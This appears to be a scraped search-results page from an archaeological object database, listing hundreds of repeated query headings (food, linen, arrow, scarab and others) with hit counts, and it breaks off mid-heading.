food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bouquet - (hits/occ.: 6)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for coffin - (hits/occ.: 13)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for arrow - (hits/occ.: 29)Results List for coffin - (hits/occ.: 13)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for gauntlet - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for 1 - (hits/occ.: 145)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for ring - (hits/occ.: 86)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for food - (hits/occ.: 49)Results List for ring - (hits/occ.: 86)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for ring - (hits/occ.: 86)Results List for food - (hits/occ.: 49)Results List for iwzxh0bgnhzw0cmtaaar33vjtk1nrmkp6x7m01byxwzqfkrggemaf95gt96trjku5jsffbnp_ha6q_aem_zmfrzwr1bw15mtziexrlcw - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for ring - (hits/occ.: 86)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for ring - (hits/occ.: 86)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for ring - (hits/occ.: 86)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for food - 